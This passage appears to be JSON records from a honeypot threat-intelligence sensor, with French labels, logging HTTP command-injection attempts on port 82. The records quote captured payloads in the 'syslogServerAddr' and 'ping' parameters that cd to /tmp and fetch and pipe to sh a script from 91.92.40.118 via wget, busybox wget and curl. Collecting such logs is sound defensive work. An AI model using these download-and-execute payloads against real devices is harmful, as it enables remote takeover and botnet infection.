\u0022271ef3ec0b94f7acc81ee352ace27ebb9a8891a7\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 301, \u0022payload_entropy\u0022: 5.194292510633869, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 9, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022a632a9bf1f4d8320042226cb00eebb392dcde5b1\u0022, \u0022event_fingerprint\u0022: \u00227a2752dc169e34c21ff169926e2833a55c481394\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00226888d4cf0873fac59d0818f5ef709ce7\u0022, \u0022path_pattern_hash\u0022: \u002220f2897c9454ee67b73f470dc30b2106\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022query_string\u0022: \u0022syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022query_string\u0022: \u0022syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20billion%60 HTTP\/1.\u0022, \u0022payload_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u00221b234cd1938706d5419bc291fc2b786ef68b0c51\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20bi\u2026\u0022, \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20h\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u2026\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20bi\u2026\u0022, \u0022request_line\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bcurl%20h\u2026\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/adv_remotelog.asp?syslogServerAddr=%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20billion%3Bbusybox%20\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002282\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:82","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950333:rce-2\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":301},{"id":11809389,"ip":"45.153.34.219","ts":"2026-07-14 02:18:16.000000","proto":"tcp","src_port":54842,"dst_port":82,"service":"http","classification":"cmd_injection","waf_score":53,"waf_tags":"[\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022]","http_method":"POST","http_target":"\/cgi-bin\/diagnostics.cgi","sensor_id":"paris-1","meta":"{\u0022http_header_count\u0022: 4, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 2, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022b00c56701bd04898edc8a488547d32d613363649\u0022, \u0022http_target_hash\u0022: \u00228e67fddb5ed6834bb822fb7e649cb34fc2111f10\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022POST\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 332, \u0022payload_entropy\u0022: 5.15466157944261, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 82, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 85.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 35.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 15, \u0022risk_granularity\u0022: 6.2, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 81, \u0022tag_count\u0022: 15, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00228eb90031395e7eb2f68e098086f1d238000fac63\u0022, \u0022event_fingerprint\u0022: \u0022301b988b0620a4579d2253f7f54a8baa92842623\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 446, \u0022precision_signals\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022kb_rule_ids\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022], \u0022matched_patterns\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022CRS 921130 duplicate CL\u0022, \u0022CRS 932100 cmd exec\u0022, \u0022CRS 932120 pipe chain\u0022, \u0022CRS 932200\u0022, \u0022CRS 932205\u0022, \u0022SSRF Localhost SSRF\u0022, \u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0842\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022, \u0022pat-0145\u0022, \u0022pat-0146\u0022, \u0022pat-0340\u0022, \u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022named_classification_skipped\u0022: false, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00220981e6674b43d3dc22433c63d8c5fbf0\u0022, \u0022path_pattern_hash\u0022: \u00225c6e845fe850f7580662d9806abb9a8a\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 81}, \u0022payload_preview\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 180\\r\\nConnection: close\\r\\n\\r\\nping=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s airspan;busybox wget http:\/\/91.92.40.1\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022POST\u0022, \u0022path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022waf_tags\u0022: [\u0022950311:lfi-12\u0022, \u0022950327:rce-0\u0022, \u0022950335:rce-2\u0022, \u0022950347:rce-5\u0022, \u0022950403:ssrf-2\u0022, \u0022950407:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950471:nosqli-3\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-2\u0022, \u0022rce-5\u0022, \u0022ssrf-2\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022], \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 180\\r\\nConnection: close\\r\\n\\r\\nping=127.0.0.1`cd \/tmp;wget http:\/\/91.92.40.118\/wget.sh -O-|sh -s airspan;busybox wget http:\/\/91.92.40.1\u0022, \u0022payload_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1059\u0022, \u0022T1190\u0022], \u0022mitre\u0022: \u0022T1059\u0022, \u0022threat_family\u0022: [\u0022rce_probe\u0022, \u0022ssrf_probe\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022ce55da647238a13ff3f992a4a5825f7b155fba72\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/diagnostics.cgi\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Injection de commande (tag lfi-12) \u00b7 Injection commande dans la requ\u00eate \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 81\/100 (\u00c9lev\u00e9) \u2014 MITRE T1059 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 85.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 35.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 81}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 81, \u0022risk_label\u0022: \u0022\u00c9lev\u00e9\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 82, \u0022protocol_emulated\u0022: null, \u0022tags_summary\u0022: [\u0022MITRE-T1059\u0022, \u0022INT-http_cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022MITRE-T1059\u0022, \u0022Http Cmdi\u0022, \u0022pat-0773\u0022, \u0022pat-0775\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1059\u0022, \u0022mitre_technique\u0022: \u0022T1059\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022POST\u0022, \u0022http_path\u0022: \u0022\/cgi-bin\/diagnostics.cgi\u0022, \u0022request_line\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\u0022, \u0022port\u0022: 82, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022cmd injection \u00b7 via HTTP:82 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/cgi-bin\/diagnostics.cgi\u0022, \u0022evidence_snippet\u0022: \u0022POST \/cgi-bin\/diagnostics.cgi HTTP\/1.1\\r\\nHost: 62.3.50.33:82\\r\\nContent-Type: application\/x-www-form-urlencoded\\r\\nContent-Length: 18\u0022, \u0022target_port_label\u0022: \u002282 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 Preuve dans le payload \u00b7 Motif catalogue confirm\u00e9\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, 